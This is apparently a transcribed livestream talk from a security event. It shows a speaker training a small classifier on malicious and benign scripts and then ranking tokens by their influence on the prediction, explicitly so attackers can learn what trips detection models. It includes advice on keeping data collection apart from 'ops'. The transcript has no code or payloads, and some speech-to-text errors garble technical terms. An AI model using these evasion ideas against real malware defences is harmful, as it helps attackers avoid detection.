sigmoid works better than value in this case. And you never tried sigmoid because you just go with standard value. You never learned that. So read everything, try everything. Hang out, hang out at AI Village. Super smart people. Just hang out at Journal Club and be a little flounder. That's what I do. Okay, so we created our model now. One thing we need to do is we need to put our documents, our, what do you call it, our vectors into our model. And when I was first starting, this is actually one of the harder pieces that I had to fit my brain. I think that's true is just the shape, the shape of arrays and how they get introduced into models. Does anyone in the chat want to take a stab at what these three question marks should be? Live. I'm, I'm hung up on the missing current disease. Yeah, but Rich has got to write the feature size. Yeah, exactly. So what is that? That would be Pretty sure it's your matrix.shape variable. What are the things that you guys do constantly? You guys must be probably missing some imports. I'll push the new version. All right, so if you're missing those imports, you're gonna want to, so we created our model. It's super simple. The text matrix, the input DIN that we're doing is an array of let's see, probably like 86,000 tokens. So, you know, across this, you're going to see that's going to look obviously like this. So we just have, I think 1200 samples times, you know, 80,000 tokens long and just gonna feed it then. Nice. And then we're going to do a test train split. When you build a model, you obviously have test data and you want to keep some test data out. But the idea is eventually that your model will be deployed into the real world where it's not going to be trained on. It's not going to be seeing test data necessarily. So ideally you want to keep some data away or out of your training set. So when it sees real data, or when it sees data it hasn't seen before, it can make a, you know, hopefully an accurate guess. So splitting them out for that reason. And I've heard you guys talk about like training leaking, leaking into your training data during training. How does that happen? So if you don't, one of the ways it could happen is you are, you could have duplicate samples that are like normally you just say, I pick a random set of indices or pick the last 20% of my indices. And that's my test set. Or you do a cross validation fold where you like divide it up somehow. And if you had duplicate data, say, like the last 20% of your data was actually duplicated with the first 20% of your data, you trained on the first four bits and then you tested on the last one. Well, it's since it's duplicated, it's included in your training set and you do really well. So you have to make sure that you don't have that sort of issue. And then there's other little things that you could have. It's basically a data cleaning issue a lot of the times. And then sometimes it's a weird bug in your code. Sometimes you can just reverse the model itself. And it'll sit, you'll say, Oh, show me what this looks like. And then it'll just print out an example from the training set. Nice. Yeah. Okay. So maybe early stopping twice early stopping. It's super nice. So if you have a really long running task and your, your model is unimproving early stopping will just stop your model. Part of me doesn't like it. And I just feel like it could some get better. But this is a tiny model. So we're not that interested. We don't really mind. Um, Crescent nice give callbacks. So if you want to use tensorboard, whatever batch size, this would be the frequency at which updates to the weights will happen. E pox, this is just time we're going to do. So the number of times that we're going to, you know, run through, we can train. It's obviously seems pretty accurate. I don't know I haven't actually tried to optimize this at all. But what do you guys do when, you know, model trains really accurately at first? Do you think it's beneficial that a you would train, you would try and overfit a model at first because that would at least indicate it could learn something. Yeah. Rich and I both get very paranoid when the thing does too well. Yeah. Yeah. Yeah. Accuracy of 100%. But something's wrong. Something must be wrong. Yes, something is wrong. And it says probably there could be any number of things. This was this version one. And, you know, I think I gave you the I'm giving you the code so you can go and recreate the model, do whatever you need to. And I would love to see love to see some blog post or some write up about everything I missed. So this is a visualization of training loss. Obviously with the gradient going down, you would like to see this going down if this were inverted. That would indicate that. Well, I could indicate a number of things, but either it's not learning or it's overfitting and it's stopped learning completely. And there are some evaluation metrics. And if it obviously it's going to be like, yeah, I did really well on this as we saw up here. So it's a little suspect. But, you know, even after you have a model, I like to pull out, you know, a couple of the best and worst examples of a category. So, you know, we're just taking the first malicious document in our, in our, because we, we, what do we do? We put them in a list such that they were, you know, malicious and then not malicious. So we're taking the first, we're taking the second malicious document and then we're going to take the last non malicious and we're just going to try and predict and see what they are. And yeah, they're a little too accurate for my liking. But, you know, that's, that's kind of it. Okay. So this is kind of where we leave you. So the first, this Excel file that you're looking at here, when I did it on all 380,000 scripts, it took me, well, and this would be dependent on whatever kind of potato you're running, but it took me 17 hours to do. So we're probably going to run it here, or you can, you might already be running it, but having to reset a few times because you thought your theme froze. But effectively what we're doing is we're just toggling absolutely every possible combination and then making a base prediction and then a new prediction. And then we're keeping a cumulative sum of those. And what you end up getting is a spread of scores across, you know, a number of predictions that will sort your tokens into malicious and non malicious. This is the same code from the proof point research, the proof point research was easier in this regard because they had a wider, you know, they had a range of one to 999, where these are hard labels and it's a zero or one. You know, as a first run through, you know, looking at the most malicious and the least malicious tokens, you know, without any optimization, if it were ever going to work, I would expect, I would expect to see that, you know, at least they're being sorted to some degree, because now you can go back and you can start, you know, tweaking the model or whatever it might be. You know, to really pull out, really hone in on what's accurate, I think a lot of times for attackers like this first version would be just fine. But, you know, if you, as you go into the future, you know, you could even do this, you could always be collecting data. And actually, I remember after my first B sites talk about machine learning last year, Rob came up to me and was like, Hey, you should, you should have a separate data gathering campaign. So you keep your ops and your, you know, your data collection separate, but your data collection can support your ops. And it doesn't necessarily burn, burn you because collecting data can be noisy. So it is a bit over time. But do you guys have any questions, comments? What I would love to see is someone to take this defender model and absolutely crush it. I didn't, I mean, it's a tiny model. I'm not sure Microsoft would care that much. The there's a VBA, this VBA data set I have not touched. So if you guys want to race to whatever, I'd love to see that comes out of it. I appreciate everybody. Thanks for coming. Hitting up in that Slack or not Slack Discord, if you have any questions, or you just want to rag on my terrible code, let's find two. But I will end it there. All right. So I think this is this is the last stream of the night. So we're closing out the Twitch stream now tomorrow. Hopefully we'll go smoother. We learned some things today. But I'll see you guys all in the morning. Hopefully.